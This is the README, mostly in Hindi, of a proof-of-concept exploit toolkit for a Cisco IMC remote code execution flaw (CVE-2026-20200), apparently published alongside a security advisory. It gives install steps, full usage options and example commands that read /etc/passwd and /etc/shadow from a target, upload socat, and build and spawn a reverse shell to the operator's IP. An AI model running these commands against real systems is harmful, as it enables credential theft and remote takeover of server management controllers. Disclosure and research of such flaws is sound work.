
Cisco IMC RCE CVE-2026-20200 का शोषण करने के लिए PoC टूलकिट
Christoph Peil @ NSIDE ATTACK LOGIC 2026
CVE: CVE-2026-20200
CVSS v3.1 (CISCO): 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS v3.1 (NSIDE): 9.9 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Advisory: NSIDE-SA-2026-003
Blogpost: https://www.nsideattacklogic.de/en/cisco-imc-when-remote-management-becomes-a-backdoor-cve-2026-20200/
यह प्रूफ-ऑफ-कॉन्सेप्ट केवल प्रदर्शन उद्देश्यों के लिए है और इसे अवैध गतिविधियों के लिए उपयोग करने की अनुमति नहीं है। NSIDE ATTACK LOGIC इस कोड के उपयोग या दुरुपयोग से होने वाली किसी भी क्षति के लिए ज़िम्मेदार नहीं है।
यह एक्सप्लॉइट फ़ाइलें डाउनलोड करने, फ़ाइलें अपलोड करने और रिवर्स शेल स्पॉन करने की सुविधा देता है। इसमें PoC की कई पायथन फ़ाइलें, एक shell फ़ोल्डर और एक download फ़ोल्डर शामिल हैं।
download फ़ोल्डर में सर्वर से डाउनलोड की गई सभी फ़ाइलें उनके नाम के साथ रखी जाती हैं (जैसे /etc/passwd > passwd)।
shell फ़ोल्डर में रिवर्स शेल के लिए आवश्यक सब कुछ होता है। lib.so फ़ाइल ARM के लिए बनाई गई एक छोटी लाइब्रेरी है, जो IMC पर /tmp/main में बाइनरी को आसानी से निष्पादित करती है। इसे बनाने के लिए उपयोग किया गया सटीक कमांड util.py में मिलता है। साथ ही, फ़ोल्डर में एक reverse_shell.go.example भी है, जो एक छोटा Go रिवर्स शेल है, जिसे पहले से कंपाइल करना आवश्यक है, ताकि रिवर्स शेल के लिए उपयोग किया जाने वाला आपका स्थानीय IP शामिल हो सके।
रिवर्स शेल के काम करने के लिए, आपको पहले इसे -a build एक्शन के साथ बिल्ड करना होगा।
sudo apt install golang-go
pip install -r requirements.txt
Usage: CIMCown.py [-h] [--proxy PROXY] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-v]
options:
-h, --help show this help message and exit
--proxy PROXY Set proxy to use, e.g. 127.0.0.1:8080 (Default: NONE)
-t, --host HOST Target hostname or IP address (format 10.0.0.1 or 10.0.0.2:1337)
-U, --username USERNAME
-P, --password PASSWORD
-a, --action ACTION Action: test, download, upload, build, shell (default: test)
Test will connect to the CIMC and download the file /etc/passwd
-u, --uploadFile UPLOADFILE
File to upload
-p, --remoteFile REMOTEFILE
Remote file path to upload to
-d, --downloadFile DOWNLOADFILE
File to download, is saved into 'Download'
-v, --verbose Displays more information about cimc
उपयोगकर्ता और पासवर्ड के लिए बड़े U और बड़े P का ध्यान रखें!
python ./CIMCown.py -U testAdmin -P testPassword -a test -t 192.168.10.2
python ./CIMCown.py -U testAdmin -P testPassword -a download -d '/etc/shadow' -t 192.168.10.2
python ./CIMCown.py -U testAdmin -P testPassword -a upload -u './shell/socat' -p '/tmp/socat' -t 192.168.10.2
python ./CIMCown.py -U testAdmin -P testPassword -a build
# action 'build' is needed before for local IP in revShell
python ./CIMCown.py -U testAdmin -P testPassword -a shell